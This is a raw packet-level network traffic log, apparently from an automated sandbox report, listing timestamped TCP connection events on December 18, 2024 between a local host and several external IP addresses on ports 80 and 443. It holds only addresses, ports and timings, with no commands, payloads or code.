                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.062370062 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.062381983 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.062433004 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.062860012 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.062870979 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.062922001 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.063819885 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.063832045 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.063874006 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.064394951 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.064405918 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.064436913 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.065248013 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.065258980 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.065294027 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.066052914 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.066791058 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.066802025 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.066832066 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.067683935 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.067699909 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.067732096 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.068511963 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.068521976 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.068552971 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.069310904 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.069322109 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.069351912 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.069988012 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.070095062 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.070162058 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.070998907 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.071012020 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.071031094 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.071202040 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.071232080 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.071903944 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.072026968 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.072082996 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.072942019 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.072954893 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.073004961 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.073544025 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.073993921 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.074033022 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.074609041 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.074621916 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.074671030 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.075376987 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.075388908 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.075476885 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.076266050 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.076416969 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.076452017 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.077115059 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.077127934 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.077159882 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.077975035 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.078818083 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.078829050 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.078850985 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.079528093 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.079540014 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.079565048 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.080348015 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.080362082 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.080387115 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.080504894 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.080537081 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.081317902 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.081331968 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.081953049 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.082139015 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.082149982 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.082798004 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.082942963 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.083501101 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.083678007 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.083713055 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.083848953 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.083916903 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.084566116 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.085380077 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.085391998 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.085550070 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.085896015 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.085926056 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.086287022 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.086736917 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.086771011 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.087203026 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.087217093 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.087264061 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.088046074 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.088262081 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.088335037 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.088891983 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.088987112 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.089020014 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.089669943 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.089906931 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.089965105 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.090651989 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.090899944 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.090943098 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.090976000 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.091284990 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.091604948 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.091634035 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.092366934 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.092379093 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.092408895 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.093122959 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.093135118 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.093169928 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.093983889 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.094286919 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.094326973 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.094882011 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.095061064 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.095093966 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.095558882 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.095849037 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.095885992 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.096436977 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.096647024 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.096679926 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.097379923 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.097397089 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.097462893 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.098104000 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.098601103 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.098635912 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.099351883 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.099363089 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.099661112 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.100236893 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.100249052 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.100310087 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.100542068 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.100790977 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.101511002 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.101521969 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.101553917 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.101921082 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.101958990 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.102420092 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.102432013 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.102469921 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.103245974 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.103640079 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.103739023 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.103976965 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.106359005 CET49784443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.106401920 CET49783443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.106415033 CET44349783172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.109121084 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.159534931 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.159564972 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.159642935 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.159663916 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.159686089 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.159706116 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.168868065 CET49782443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.168889999 CET49785443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.169321060 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.169352055 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.169373989 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.169385910 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.169395924 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.169436932 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.169441938 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.169454098 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.169481993 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.169495106 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.169519901 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.169533014 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.182063103 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.182142973 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.182151079 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.182173967 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.182199001 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.182215929 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.182375908 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.182439089 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.182445049 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.182468891 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.182495117 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.182513952 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.194498062 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.194520950 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.194550037 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.194562912 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.194574118 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.194581985 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.194636106 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.194648027 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.194681883 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.194698095 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.204693079 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.204713106 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.204727888 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.204756975 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.204766989 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.204768896 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.204828024 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.204829931 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.204840899 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.204894066 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.211322069 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.211344957 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.211359024 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.211388111 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.211397886 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.211402893 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.211438894 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.211441994 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.211453915 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.211481094 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.211482048 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.211508036 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.215740919 CET49783443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.217581987 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.217617035 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.217644930 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.217652082 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.217670918 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.217694044 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.217711926 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.218596935 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.218612909 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.218667030 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.218702078 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.218738079 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.218760967 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.218772888 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.218797922 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.218821049 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.219245911 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.219258070 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.219296932 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.219862938 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.219875097 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.220383883 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.220520020 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.223243952 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.223288059 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.223321915 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.223330975 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.223361015 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.223376989 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.248353004 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.248382092 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.255386114 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.255490065 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.255501032 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.255800962 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.255814075 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.255862951 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.256552935 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.256566048 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.256594896 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.257420063 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.257431030 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.257471085 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.258203030 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.258217096 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.258253098 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.258948088 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.259785891 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.259802103 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.259835005 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.260660887 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.260673046 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.260729074 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.260776997 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.261477947 CET8049776139.99.188.124192.168.2.6
